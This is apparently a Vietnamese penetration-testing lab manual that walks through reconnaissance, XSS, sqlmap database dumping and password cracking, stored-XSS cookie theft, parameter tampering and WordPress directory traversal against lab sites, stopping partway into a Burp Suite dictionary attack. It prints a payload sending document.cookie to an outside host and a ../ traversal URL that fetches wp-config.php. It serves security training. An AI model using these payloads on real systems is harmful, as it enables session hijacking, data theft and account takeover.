Mục tiêu:
Mục tiêu của bài thực hành này là cung cấp kiến thức chuyên môn về các lỗ hổng ứng dụng web và các cuộc tấn công web như:
- Tấn công SQL Injection
- Thay đổi tham số
- Cross-Site Scripting (XSS)
- Tấn công từ điển
- Tải lên tệp độc hại
- Directory Traversal (Duyệt thư mục trái phép)
Kịch bản:
Một ứng dụng web là ứng dụng được người dùng truy cập qua mạng như internet hoặc mạng nội bộ. Thuật ngữ này cũng có nghĩa là phần mềm máy tính chạy trên một máy chủ và được hiển thị trong trình duyệt web của người dùng. Các ứng dụng web được tạo ra bằng cách kết hợp mã máy chủ (ví dụ như bằng ngôn ngữ lập trình như Java, Python) với mã phía máy khách (ví dụ như JavaScript, HTML) để tạo ra một ứng dụng có thể thực thi trong trình duyệt web.
Ứng dụng web rất phổ biến do tính tiện dụng của chúng, khả năng truy cập thông qua trình duyệt web, và sự tiện lợi của việc không cần cài đặt phần mềm trên máy khách. Các ứng dụng web được sử dụng rộng rãi trong thương mại điện tử, hỗ trợ khách hàng, cộng đồng trực tuyến và nhiều chức năng khác.
Ứng dụng web thường giao tiếp với nhau bằng HTTP, giao thức có thể bị thao túng hoặc can thiệp bằng cách thay đổi các tham số trong URL, hoặc bằng cách can thiệp vào các phần tử khác của giao thức HTTP. Các cuộc tấn công phổ biến bao gồm SQL injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), và nhiều cuộc tấn công khác.
Là một Chuyên gia Kiểm thử Xâm nhập, bạn cần kiểm tra các ứng dụng web về các lỗ hổng và đảm bảo bảo mật cho ứng dụng web trước các cuộc tấn công tiềm ẩn như tải lên tệp, tấn công từ điển, v.v.
Bài tập 1: Thu thập thông tin về mục tiêu bằng WhatWeb
Kịch bản:
WhatWeb xác định các trang web bằng cách nhận dạng các công nghệ web, bao gồm hệ thống quản lý nội dung (CMS), nền tảng blog, gói phân tích thống kê, thư viện JavaScript, máy chủ web và các thiết bị nhúng. WhatWeb cũng xác định số phiên bản, địa chỉ email, tài khoản, ID địa chỉ, mô-đun framework, truy vấn SQL và nhiều thông tin khác.
Mục tiêu của bài thực hành này là giúp học viên học cách:
- Xác định các công nghệ trang web mục tiêu
- Thực hiện quét trang web
- Ghi lại kết quả đầu ra ở định dạng báo cáo
Thời lượng thực hành: 10 phút
- Nhấp vào Parrot. Nhập toor vào trường Mật khẩu và nhấn Enter.
(Hình ảnh màn hình đăng nhập Parrot)
- Khởi chạy cửa sổ dòng lệnh từ thanh tác vụ, nhập whatweb và nhấn Enter. Nó sẽ hiển thị danh sách các lệnh được sử dụng bởi whatweb.
(Hình ảnh màn hình terminal hiển thị help của whatweb)
- Giả sử www.luxurytreats.com là trang web mục tiêu trong bài thực hành này. Bạn sẽ thực hiện xác định website đối với trang web này. Nhập lệnh whatweb www.luxurytreats.com và nhấn Enter.
(Hình ảnh màn hình terminal hiển thị lệnh whatweb www.luxurytreats.com)
- whatweb trả về cấu trúc hạ tầng trang web luxurytreats như được hiển thị trong ảnh chụp màn hình. Bỏ qua các thông báo cảnh báo.
(Hình ảnh màn hình hiển thị kết quả của whatweb)
- Vì kết quả trả về bởi whatweb khó phân tích, bạn có thể áp dụng chế độ verbose để whatweb sắp xếp kết quả một cách rõ ràng hơn. Nhập lệnh whatweb -v www.luxurytreats.com và nhấn Enter.
(Hình ảnh màn hình terminal hiển thị lệnh whatweb -v www.luxurytreats.com)
- WhatWeb sắp xếp lại kết quả theo cách dễ hiểu hơn như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình terminal hiển thị kết quả chi tiết)
Bạn có thể đặt WhatWeb ở chế độ aggressive để lấy số phiên bản của các plugin được sử dụng trong trang web.
- Bạn có thể xuất kết quả được trả về bởi WhatWeb ra một tệp. Để xuất kết quả ra tệp, nhập lệnh whatweb –log-verbose luxurytreats.report www.luxurytreats.com và nhấn Enter. Lệnh này sẽ tạo một báo cáo với tên luxurytreats.report và lưu tệp này trong thư mục root.
(Hình ảnh màn hình hiển thị lệnh whatweb –log-verbose)
- Điều hướng đến thư mục Places -> Home Folder để tìm báo cáo chứa kết quả.
(Hình ảnh màn hình hiển thị đường dẫn đến Home Folder)
- Thư mục pentester xuất hiện, nhấp đúp vào luxurytreats.report.
(Hình ảnh màn hình hiển thị thư mục pentester và file luxurytreats.report)
- Báo cáo xuất hiện trong tệp văn bản như được hiển thị trong ảnh chụp màn hình. Phân tích kết quả để có cái nhìn tổng quan về cấu trúc hạ tầng website.
(Hình ảnh màn hình hiển thị nội dung file luxurytreats.report)
- Đóng tất cả các cửa sổ đã mở.
Trong bài thực hành này, bạn đã học cách:
- Xác định các công nghệ trang web mục tiêu
- Thực hiện quét trang web
- Ghi lại kết quả đầu ra ở định dạng báo cáo
Bài tập 2: Đánh giá lỗ hổng ứng dụng Web bằng Vega
Kịch bản:
Vega là một trình quét và nền tảng kiểm thử mã nguồn mở miễn phí để kiểm tra bảo mật của các ứng dụng web. Vega giúp tìm ra các lỗ hổng SQL Injection, Cross-Site Scripting (XSS), tiết lộ thông tin nhạy cảm vô ý và các lỗ hổng khác. Nó được viết bằng Java và chạy trên Linux, OS X và Windows. Vega bao gồm một trình quét tự động để quét nhanh và một giao diện proxy để kiểm tra thủ công. Trình quét Vega tìm thấy XSS, SQL injection và các lỗ hổng khác. Vega có thể được mở rộng bằng API mạnh mẽ bằng ngôn ngữ web, JavaScript.
Mục tiêu của bài thực hành này là giúp học viên học cách:
- Sử dụng Vega và thực hiện Đánh giá Lỗ hổng Ứng dụng Web
- Tạo báo cáo và kiểm tra chúng
Thời lượng thực hành: 20 phút
- Nhấp vào Parrot. Nhập toor vào trường Mật khẩu và nhấn Enter.
(Hình ảnh màn hình đăng nhập)
Nếu bạn đã đăng nhập, hãy bỏ qua bước 2.
- Khởi chạy cửa sổ Terminal từ thanh menu. Nhập cd vega và nhấn Enter.
(Hình ảnh màn hình terminal hiển thị lệnh cd vega)
- Nhập ./vega và nhấn Enter để khởi chạy ứng dụng.
(Hình ảnh màn hình terminal hiển thị lệnh ./vega)
- Cửa sổ trình quét lỗ hổng Vega xuất hiện như được hiển thị trong ảnh chụp màn hình bên dưới. Nhấp vào Scan từ thanh menu và chọn New Scan.
(Hình ảnh màn hình ứng dụng Vega)
- Trên màn hình xuất hiện phần Select a Scan Target. Chọn nút radio Scan a base URL trong phần Target, nhập URL mục tiêu vào trường văn bản và nhấp vào Next. Mục tiêu trong bài thực hành này là luxurytreats, vì vậy URL sẽ là www.luxurytreats.com.
(Hình ảnh màn hình Vega với URL www.luxurytreats.com được nhập)
- Xuất hiện phần Select Modules. Bằng cách chọn cả hai tùy chọn Injection Modules và Response Processing Modules, tất cả các mô-đun trong các tùy chọn này sẽ được chọn. Nhấp vào Finish.
(Hình ảnh màn hình Vega với Injection Modules và Response Processing Modules được chọn)
- Vega sẽ bắt đầu quét www.luxurytreats.com. Quá trình quét sẽ mất khoảng 40 phút để hoàn thành. Nếu bạn đã có kết quả quét của trang web mục tiêu, bạn có thể tiếp tục với quá trình tiếp theo.
(Hình ảnh màn hình hiển thị quá trình quét Vega đang chạy)
- Khi hoàn thành quá trình quét, vega hiển thị tóm tắt cảnh báo quét như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị tóm tắt cảnh báo quét của Vega)
- Để xem các cảnh báo quét, mở rộng các nút sau: http://www.luxurytreats.com -> Scan Alerts -> High -> Cross Site Scripting (XSS). Nó sẽ hiển thị siêu dữ liệu cho lỗ hổng XSS được tìm thấy như trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị chi tiết lỗ hổng XSS)
Đây là ảnh chụp màn hình cho lỗ hổng SQL Injection được tìm thấy trong trang web được quét. Chúng ta sẽ trình bày cách khai thác lỗ hổng này trong bài tập tiếp theo.
- Tương tự, bạn có thể mở rộng nút SQL Injection để xem thông tin liên quan đến lỗ hổng SQL Injection được chọn.
(Hình ảnh màn hình hiển thị chi tiết lỗ hổng SQL Injection)
Đây là ảnh chụp màn hình cho lỗ hổng SQL Injection được tìm thấy trong trang web được quét. Chúng ta sẽ trình bày cách khai thác lỗ hổng này trong bài tập tiếp theo.
- Nhấp vào nội dung REQUEST trong khung bên phải.
(Hình ảnh màn hình hiển thị tab REQUEST)
- Bạn sẽ được chuyển hướng đến tab Requests. Ở phía dưới khung bên phải, nhấp vào Request và sao chép toàn bộ nội dung.
(Hình ảnh màn hình hiển thị tab Requests)
- Thu nhỏ ứng dụng Vega. Mở một tệp văn bản mới và dán nội dung REQUEST đã sao chép.
- Đảm bảo rằng tất cả các khoảng trắng và dòng mới không cần thiết đều được xóa, tức là toàn bộ nội dung yêu cầu phải liền mạch. Đóng tệp văn bản.
Bạn có thể so sánh nội dung Vega với nội dung trong tệp văn bản và xóa các dòng mới khỏi nội dung yêu cầu.
- Đổi tên tệp thành SQL Injection Request.
(Hình ảnh màn hình hiển thị tệp văn bản có tên “SQL Injection Request”)
Trong bài thực hành này, bạn đã học cách:
- Sử dụng và thực hiện Đánh giá Lỗ hổng Ứng dụng Web thông qua Vega.
- Tạo báo cáo và kiểm tra chúng.
Bài tập 3: Xâm nhập các ứng dụng Web đã xác định lỗ hổng
Kịch bản:
Trong bài tập trước, bạn đã thực hiện phân tích lỗ hổng ứng dụng web bằng Vega. Trong bài tập đó, trình quét ứng dụng web đã phát hiện hai lỗ hổng chính: XSS và SQL Injection. Nếu những kẻ tấn công xác định được những lỗ hổng này, chúng có thể truy cập thông tin nhạy cảm, dẫn đến vi phạm dữ liệu.
Là một Chuyên gia Kiểm thử Xâm nhập, bạn cần có kiến thức về cách xâm nhập các lỗ hổng này và trích xuất dữ liệu nhạy cảm.
Trong bài thực hành này, bạn sẽ học cách:
- Xâm nhập lỗ hổng cross-site scripting bằng javascript
- Xâm nhập lỗ hổng SQL injection bằng sqlmap
Thời lượng thực hành: 30 phút
- Trong bài tập này, chúng ta sẽ thực hiện tấn công Cross-Site Scripting trên trang web www.luxurytreats.com vì chúng ta đã phát hiện ra rằng trang web này có lỗ hổng XSS trong bài tập trước.
- Nhấp vào Parrot. Nhập toor vào trường Mật khẩu và nhấn Enter.
(Hình ảnh màn hình đăng nhập)
Nếu bạn đã đăng nhập, hãy bỏ qua bước 3.
- Khởi chạy trình duyệt web, nhập http://www.luxurytreats.com và nhấn Enter để mở trang web luxurytreats như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị trang web luxurytreats)
- Nhấp vào Contact từ menu (phía trên bên phải). Trang Contact sẽ xuất hiện như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị trang Contact)
- Nhập bất kỳ địa chỉ email nào vào trường Email. Nhập <script>alert(“XSS attack”)</script> vào trường Comment và nhấp vào Save Comment.
(Hình ảnh màn hình hiển thị mã XSS được chèn vào trường Comment)
Ở đây, chúng tôi đã sử dụng xyz@example.com làm ID email mẫu. Bạn có thể sử dụng bất kỳ địa chỉ email nào theo sở thích của bạn.
- Một cửa sổ bật lên xuất hiện hiển thị “XSS attack”. Điều này chứng tỏ rằng trang web dễ bị tấn công XSS. Nhấp vào OK và đóng tất cả các cửa sổ đã mở.
(Hình ảnh màn hình hiển thị cảnh báo XSS)
- “Comment Successfully Added!” sẽ xuất hiện hiển thị ID email mà bạn đã nhập vào trường Email. Điều này cho thấy rằng đoạn script đã được lưu trữ trong cơ sở dữ liệu phía sau. Và bất cứ khi nào bạn mở trang Contact, đoạn script này sẽ được thực thi, hiển thị thông báo “XSS attack”. Bạn có thể thử điều này bằng cách tải lại trang Contact.
(Hình ảnh màn hình hiển thị thông báo “Comment Successfully Added!”)
- Đóng tất cả các cửa sổ đã mở.
- Từ quá trình quét Vega của chúng ta trong bài tập trước, chúng ta đã quan sát thấy rằng www.luxurytreats.com dễ bị tấn công SQL Injection. Ở đây, chúng ta sẽ thử thực hiện tấn công SQL Injection trên trang web để trích xuất thông tin nhạy cảm từ cơ sở dữ liệu của nó.
- Nhấp đúp vào tệp SQL Injection Request trên Desktop để mở tệp.
(Hình ảnh màn hình hiển thị tệp SQL Injection Request)
- Tệp SQL Injection Request mở ra như được hiển thị trong ảnh chụp màn hình. Chọn toàn bộ nội dung, nhấp chuột phải vào đó và nhấp vào Copy để sao chép toàn bộ nội dung yêu cầu. Thu nhỏ trình soạn thảo văn bản sau khi sao chép.
(Hình ảnh màn hình hiển thị nội dung tệp SQL Injection Request)
- Bây giờ, chúng ta sẽ sử dụng sqlmap để trích xuất cơ sở dữ liệu. Để trích xuất, nhập lệnh sau vào terminal: sqlmap -u http://www.luxurytreats.com –method POST –data “[Copied POST Request]” và nhấn Enter.
(Hình ảnh màn hình terminal hiển thị lệnh sqlmap)
- sqlmap hiển thị thông báo cho biết cơ sở dữ liệu phía sau là Microsoft SQL Server và hỏi bạn có muốn bỏ qua các payload kiểm tra cụ thể cho các DBMS khác hay không. Nhập Y và nhấn Enter để bỏ qua các payload cụ thể cho các DBMS khác.
(Hình ảnh màn hình terminal hiển thị thông báo của sqlmap)
- Nhập Y và nhấn Enter để bao gồm tất cả các bài kiểm tra cho Microsoft SQL Server, mở rộng phạm vi mức (11) và giá trị rủi ro (1).
(Hình ảnh màn hình terminal hiển thị các tùy chọn kiểm tra sqlmap)
- Nhập N và nhấn Enter để bỏ qua việc kiểm tra các tham số khác.
(Hình ảnh màn hình terminal)
- sqlmap trích xuất tất cả các cơ sở dữ liệu trong DBMS như được hiển thị trong ảnh chụp màn hình bên dưới. Trong bài thực hành này, chúng ta sẽ nhắm mục tiêu cơ sở dữ liệu hotel.
(Hình ảnh màn hình terminal hiển thị các cơ sở dữ liệu được trích xuất)
- Nhập sqlmap -u http://www.luxurytreats.com –method POST –data “[Copied POST request]” -D hotel –tables và nhấn Enter để trích xuất các bảng trong cơ sở dữ liệu hotel.
(Hình ảnh màn hình terminal hiển thị lệnh sqlmap để trích xuất các bảng)
- Các bảng trong cơ sở dữ liệu hotel được trích xuất như được hiển thị trong ảnh chụp màn hình. Chúng ta sẽ sử dụng bảng CustomerLogin và trích xuất chi tiết của nó trong bước tiếp theo.
(Hình ảnh màn hình terminal hiển thị các bảng được trích xuất)
- Nhập sqlmap -u http://www.luxurytreats.com –method POST –data “[Copied POST request]” -D hotel -T CustomerLogin –dump và nhấn Enter để xuất tất cả các chi tiết của bảng CustomerLogin.
(Hình ảnh màn hình terminal hiển thị lệnh sqlmap để xuất dữ liệu bảng)
- sqlmap hiển thị thông báo hỏi bạn có muốn lưu trữ băm vào tệp tạm thời hay không. Nhập N và nhấn Enter.
(Hình ảnh màn hình terminal)
- Nhập Y và nhấn Enter để bẻ khóa băm thông qua tấn công dựa trên từ điển.
(Hình ảnh màn hình terminal)
- sqlmap yêu cầu bạn chọn từ điển. Nhập 1 và nhấn Enter để chọn tệp từ điển mặc định của sqlmap.
(Hình ảnh màn hình terminal)
- Nhập N và nhấn Enter nếu bạn được hỏi về các hậu tố mật khẩu phổ biến, như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình terminal)
- Mật khẩu cho các tên người dùng tương ứng đã bị bẻ khóa như được hiển thị trong ảnh chụp màn hình. Ảnh chụp màn hình cũng hiển thị các cột có trong bảng CustomerLogin.
(Hình ảnh màn hình terminal hiển thị mật khẩu bị bẻ khóa)
- Khởi chạy trình duyệt web Firefox, truy cập trang web http://www.luxurytreats.com và sử dụng tên người dùng admin và mật khẩu Password để đăng nhập vào trang web như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị trang đăng nhập luxurytreats)
- Bạn sẽ đăng nhập thành công vào trang web với thông tin đăng nhập đã bị bẻ khóa.
(Hình ảnh màn hình hiển thị trang web luxurytreats sau khi đăng nhập)
- Đóng tất cả các cửa sổ đã mở.
Trong bài thực hành này, bạn đã học cách xâm nhập các lỗ hổng XSS và SQL Injection được phát hiện bởi trình quét lỗ hổng ứng dụng web.
Bài tập 4: Xâm nhập ứng dụng Web đối với lỗ hổng XSS được lưu trữ và thao túng tham số
Kịch bản:
XSS được lưu trữ là nơi mã độc được chèn vĩnh viễn vào máy chủ mục tiêu, chẳng hạn như trong cơ sở dữ liệu. Mã độc này được kích hoạt khi nạn nhân truy cập máy chủ đó. Các cuộc tấn công độc hại được chèn vào máy chủ khi nó có lỗ hổng XSS được lưu trữ và vẫn tồn tại trên máy chủ trừ khi được phát hiện và xóa. Khi một nhân viên trong một tổ chức trở thành nạn nhân của kịch bản này, những kẻ tấn công sẽ chiếm đoạt ID phiên tương ứng với nạn nhân, do đó truy cập trái phép vào ứng dụng web mà không cần đăng nhập hợp pháp vào ứng dụng web. Là một hacker đạo đức hoặc Chuyên gia Kiểm thử Xâm nhập, bạn cần bảo vệ một trang web khỏi việc thực thi các tập lệnh độc hại và do đó bảo vệ các phiên người dùng khỏi bị đánh cắp.
Mục tiêu của bài thực hành này là giúp học viên học cách:
- Kiểm tra ứng dụng web về các lỗ hổng
- Sử dụng Firebug để chiếm quyền phiên
Thời lượng thực hành: 30 phút
- Nhấp vào Windows Server 2019 và nhấp vào Ctrl+Alt+Delete.
(Hình ảnh màn hình đăng nhập Windows Server)
- Trong trường mật khẩu, nhấp vào Password và nhấn Enter.
- Khởi chạy trình duyệt web Google Chrome, nhập URL http://www.moviescope.com vào thanh địa chỉ và nhấn Enter. Trang đăng nhập moviescope sẽ xuất hiện như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình đăng nhập moviescope)
- Đăng nhập vào trang web với tư cách là người dùng thông thường. Sử dụng thông tin đăng nhập sau để đăng nhập vào trang web:
Tên người dùng: steve
Mật khẩu: test
- Bạn đã đăng nhập với tư cách là người dùng thông thường và lưu ý rằng bạn không có bất kỳ đặc quyền quản trị nào.
- Nhấp vào tab Blog, cuộn xuống phần Leave a Comment, nhập truy vấn sau vào trường Comment và nhấp vào Submit Comment:
<a onclick=”document.location=’http://www.oceanplaza.com/Default.aspx?cookie=’+escape(document.cookie)” href=”#”>Please click here to visit website</a>
(Hình ảnh màn hình hiển thị truy vấn XSS được chèn)
- Một liên kết bình luận sẽ được đăng với nội dung “Please click here to visit website” (như chúng tôi đã nêu trong nhiệm vụ trước).
Bây giờ, bất cứ khi nào người dùng đã đăng nhập vào trang web truy cập trang web này (trang Blog) và nhấp vào liên kết, tập lệnh độc hại chạy phía sau sẽ được kích hoạt và ngay lập tức giá trị cookie được trích xuất sẽ được lưu trữ trong một tệp có tên Mycookies.txt tại vị trí C:\inetpub\wwwroot\oceanplaza\CookieSteal.
- Nhấp vào Sales Department và nhấp vào Ctrl+Alt+Delete.
(Hình ảnh màn hình đăng nhập Windows Server)
- Hồ sơ Admin mặc định được chọn. Nhấp vào test@123 và nhấn Enter để đăng nhập.
(Hình ảnh màn hình đăng nhập Windows Server với tài khoản Admin)
- Khởi chạy trình duyệt web Google Chrome, nhập URL http://www.moviescope.com/Login/Home vào thanh địa chỉ và nhấn Enter. Trang moviescope sẽ xuất hiện như được hiển thị trong ảnh chụp màn hình.
- Giả sử bạn là người dùng quản trị và đăng nhập vào trang web bằng thông tin đăng nhập sau:
Tên người dùng: sam
Mật khẩu: test
- Bạn đã đăng nhập với tư cách là người dùng quản trị và bạn có thể thấy rằng trang web hiển thị vai trò của bạn (Admin) bên cạnh nút Logout. Nhấp vào Blog.
(Hình ảnh màn hình hiển thị trang web moviescope sau khi đăng nhập với tư cách là quản trị viên)
- Trang web Blog xuất hiện trên cửa sổ trình duyệt. Cuộn xuống trang và nhấp vào liên kết “Please click here to visit website”.
(Hình ảnh màn hình hiển thị trang Blog)
- Người dùng quản trị, khi nhìn thấy trang web trống/không khả dụng, sẽ nhấp vào liên kết “here” để quay lại.
(Hình ảnh màn hình hiển thị trang web không khả dụng)
Trong thời gian thực, nạn nhân (người dùng quản trị) sẽ được chuyển hướng đến trang web trống/không khả dụng, nhấp vào liên kết “here” để quay lại trang trước, mà không hề biết rằng một cuộc tấn công đã được thực hiện để đánh cắp cookie.
- Bạn sẽ được chuyển hướng đến trang Blog của trang web moviescope như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị trang Blog)
Không đăng xuất khỏi trang web chừng nào bạn còn thực hiện bài thực hành này.
- Nhấp vào Windows Server 2019. Thu nhỏ trình duyệt.
- Điều hướng đến vị trí C:\inetpub\wwwroot\oceanplaza\CookieSteal và nhấp đúp vào tệp Mycookies.txt.
- Tệp văn bản chứa cookie của phiên đã xác thực của người dùng mục tiêu như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị nội dung của tệp Mycookies.txt)
- Chuyển sang trình duyệt web và nhấp vào tab View Profile. Lưu ý rằng steve là người dùng thông thường, chứ không phải quản trị viên.
(Hình ảnh màn hình hiển thị hồ sơ của steve)
- Bạn sẽ thấy rằng hồ sơ của steve được hiển thị trên trang web. Bây giờ, nhấp vào Customize and control Google Chrome (biểu tượng More [ba chấm dọc]) và chọn More Tools -> Developer tools.
(Hình ảnh màn hình hiển thị hồ sơ của steve)
- Bảng công cụ Developer tools xuất hiện. Nhấp vào Application và sau đó mở rộng Cookies trong phần Storage và chọn moviescope như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị cookie trong Developer tools)
- Bạn sẽ thấy danh sách các cookie. Lưu ý rằng bạn cần thay đổi cookie đó, mà trạng thái hết hạn trong tab Expires được đề cập là Session.
(Hình ảnh màn hình hiển thị danh sách các cookie)
- Phóng to tệp Mycookies.txt và sao chép giá trị cookie như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị nội dung của tệp Mycookies.txt)
- Nhấp chuột phải vào mscookie trong phần cookie và chọn “Edit ‘Value’”.
- Bây giờ, dán giá trị cookie đã sao chép, và sau đó đóng bảng Developer tools.
(Hình ảnh màn hình hiển thị giá trị cookie đã được dán)
- Bây giờ, hãy làm mới trang web, bạn sẽ thấy rằng tên người dùng đã thay đổi thành sam (quản trị viên) và bạn đã đăng nhập với tư cách là sam. Nhấp vào tab View Profile.
- Hồ sơ của sam xuất hiện như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị hồ sơ của sam)
- Trong trang hồ sơ của Sam, bạn sẽ thấy giá trị của ID là 1 trong thanh địa chỉ. Bây giờ hãy thử thay đổi tham số thành ID=2 trong thanh địa chỉ và nhấn Enter. Bạn sẽ nhận được hồ sơ của John mà không cần thực hiện bất kỳ kỹ thuật SQL Injection nào để khám phá cơ sở dữ liệu.
(Hình ảnh màn hình hiển thị hồ sơ của sam và john)
- Bây giờ, hãy thay đổi tham số thành ID=3 trong thanh địa chỉ và nhấn Enter. Bạn sẽ nhận được hồ sơ của katy. Bằng cách này, bạn có thể cố gắng thay đổi ID và lấy thông tin hồ sơ người dùng.
(Hình ảnh màn hình hiển thị hồ sơ của katy)
- Trong bài thực hành này, rõ ràng là:
- Trang web này dễ bị tấn công XSS được lưu trữ.
- Các giá trị cookie không được mã hóa và có sẵn dưới dạng văn bản thuần túy.
- Trang web không thể chặn Thao túng Tham số.
Trong bài thực hành này, bạn đã học cách:
- Kiểm tra ứng dụng web về các lỗ hổng.
- Sử dụng Firebug để chiếm quyền phiên.
Bài tập 5: Khai thác lỗ hổng Directory Traversal trong ứng dụng WordPress
Kịch bản:
Directory Traversal cho phép kẻ tấn công truy cập các thư mục bị hạn chế, bao gồm mã nguồn ứng dụng, cấu hình và các tệp quan trọng, và thực thi các lệnh bên ngoài thư mục gốc của trang web. Kẻ tấn công thường thao túng các biến tham chiếu các tệp bên ngoài thư mục gốc của trang web bằng các chuỗi “../” và các biến thể của nó để truy cập các thư mục bị hạn chế. Là một chuyên gia kiểm tra xâm nhập, bạn cần biết cách xác định thư mục duyệt web bị lỗi và tận dụng nó để có quyền truy cập thông tin nhạy cảm.
Trong bài thực hành này, bạn sẽ học cách:
- Liệt kê các plugin WordPress bằng wpscan
- Xác định lỗ hổng bằng SearchSploit
- Khai thác lỗ hổng để tải xuống các tệp nhạy cảm
Thời lượng thực hành: 20 phút
- Nhấp vào Parrot. Nhập toor vào trường Mật khẩu và nhấn Enter.
(Hình ảnh màn hình đăng nhập)
Nếu bạn đã đăng nhập, hãy bỏ qua bước 2.
- Trong bài thực hành này, chúng ta sẽ thực hiện kiểm tra xâm nhập trên một trang web wordpress với URL http://www.cpent.com. Vì chúng ta không có bất kỳ thông tin nào về trang web wordpress này, chúng ta sẽ thực hiện liệt kê plugin trên trang web này bằng wpscan với hy vọng tìm ra lỗ hổng.
- Khởi chạy một cửa sổ dòng lệnh, nhập wpscan –url http://www.cpent.com –enumerate p và nhấn Enter. Lệnh này bắt đầu liệt kê plugin trên trang web wordpress.
(Hình ảnh màn hình terminal)
Nếu xuất hiện thông báo yêu cầu bạn cập nhật wpscan, hãy nhập N và nhấn Enter để bỏ qua cập nhật.
- WPSCAN liệt kê các plugin và hiển thị chúng như được hiển thị trong ảnh chụp màn hình. Trong bài thực hành này, chúng ta sẽ tập trung vào plugin ebook-download.
(Hình ảnh màn hình terminal)
- Bây giờ, chúng ta sẽ tìm kiếm các khai thác công khai cho plugin ebook-download. Nhập searchsploit ebook download 1.1 và nhấn Enter.
- Searchsploit trả về kết quả như được hiển thị trong ảnh chụp màn hình. Lỗ hổng được phát hiện là duyệt thư mục và khai thác có ID là 39575.
(Hình ảnh màn hình terminal)
- Bây giờ chúng ta sẽ sao chép khai thác vào thư mục gốc. Để sao chép, nhập searchsploit -m 39575 và nhấn Enter. Một bản sao của khai thác được lưu trữ trong thư mục gốc như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình terminal)
- Nhập cat 39575.txt và nhấn Enter để xem bằng chứng khái niệm được viết trong tệp khai thác.
(Hình ảnh màn hình terminal)
- Có thể thấy rằng lỗ hổng duyệt thư mục có trong tệp filedownload.php. Chúng ta sẽ sử dụng URL này để tải xuống tệp wp-config.php.
- Chúng ta sẽ nhập URL vào trang web wordpress là http://www.cpent.com. Lỗ hổng duyệt thư mục có trong http://www.cpent.com/wp-content/plugins/ebook-download/filedownload.php?url=../../../wp-config.php.
- Khởi chạy trình duyệt web Firefox, nhập http://www.cpent.com/wp-content/plugins/ebook-download/filedownload.php?url=../../../wp-config.php và nhấn Enter.
- Hộp thoại Opening wp-config.php xuất hiện, chọn nút radio Save File và nhấp vào OK.
(Hình ảnh màn hình hiển thị hộp thoại tải xuống)
- Một cửa sổ xuất hiện hiển thị vị trí tải xuống mặc định. Chọn Home ở khung bên trái và nhấp vào nút Save. Thao tác này sẽ tải xuống tệp wp-config.php vào thư mục pentester.
(Hình ảnh màn hình hiển thị vị trí tải xuống)
- Bạn sẽ thấy tệp wp-config.php đã tải xuống trong thư mục gốc như được hiển thị trong ảnh chụp màn hình, cho thấy lỗ hổng duyệt thư mục đã được khai thác thành công.
(Hình ảnh màn hình hiển thị tệp wp-config.php đã tải xuống)
- Thu nhỏ cửa sổ trình duyệt, điều hướng đến Places và nhấp vào Home Folder để xem tệp wp-config.php đã tải xuống.
- Đóng tất cả các cửa sổ đã mở.
(Hình ảnh màn hình hiển thị nội dung của tệp wp-config.php)
Trong bài thực hành này, bạn đã học cách:
- Liệt kê các plugin WordPress bằng wpscan
- Xác định lỗ hổng bằng SearchSploit
- Khai thác lỗ hổng để tải xuống các tệp nhạy cảm
Bài tập 6: Thực hiện tấn công từ điển trên ứng dụng Web WordPress bằng Burp Suite
Kịch bản:
Việc sử dụng các kết hợp tên người dùng/mật khẩu yếu để đăng nhập vào các ứng dụng web có thể cho phép kẻ tấn công tấn công brute-force và có quyền truy cập vào các tài khoản đó. Điều này dẫn đến việc truy cập không hạn chế vào tài khoản người dùng và thao túng dữ liệu trong các tài khoản đó.
Là một chuyên gia kiểm tra xâm nhập, bạn nên có thể xác định các kết hợp tên người dùng/mật khẩu yếu trong các ứng dụng web. Trong bài thực hành này, bạn sẽ học cách thực hiện tấn công từ điển trên ứng dụng web WordPress bằng Burp Suite.
Thời lượng thực hành: 30 phút
- Nhấp vào Parrot. Nhập toor vào trường Mật khẩu và nhấn Enter.
(Hình ảnh màn hình đăng nhập)
Nếu bạn đã đăng nhập rồi, hãy bỏ qua bước 2.
- Trong bài thực hành này, chúng ta sẽ nhắm mục tiêu một ứng dụng web với URL http://www.cpent.com.
- Khởi chạy trình duyệt web, nhập URL http://www.cpent.com và nhấn Enter. Trang web CPENT Demo sẽ xuất hiện như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình)
- Trong bài thực hành này, chúng ta sẽ khởi chạy một cuộc tấn công từ điển trên trang web để xem có bất kỳ kết hợp tên người dùng/mật khẩu yếu nào hay không. Ở đây, chúng ta sẽ nhập các thông tin đăng nhập ngẫu nhiên. Khởi chạy Burp Suite để thực hiện tấn công từ điển. Nhập wp-login.php vào thanh địa chỉ và nhấn Enter. Thao tác này sẽ hiển thị trang đăng nhập CPENT Demo Site.
(Hình ảnh màn hình hiển thị trang đăng nhập)
- Mở menu Firefox và nhấp vào Preferences như được hiển thị trong ảnh chụp màn hình.
(Hình ảnh màn hình hiển thị menu Firefox)
- Cửa sổ Preferences xuất hiện với các cài đặt General. Cuộn xuống và nhấp vào Settings trong phần Network Settings.
(Hình ảnh màn hình hiển thị cửa sổ Preferences)
- Cửa sổ Connection Settings xuất hiện, nhấp vào nút radio Manual proxy configuration. Nhập địa chỉ IP 127.0.0.1 vào trường HTTP Proxy, chỉ định cổng 8080 vào trường Port, chọn Use this proxy server for all protocols và nhấp vào OK.
(Hình ảnh màn hình)
- Đóng tab Preferences và thu nhỏ trình duyệt web.
- Mở cửa sổ dòng lệnh và nhập sudo update-alternatives –config java và nhấn Enter. Nếu có 2 lựa chọn cho Java, hãy nhập số và nhấn Enter. Đóng cửa sổ dòng lệnh.
(Hình ảnh màn hình terminal)
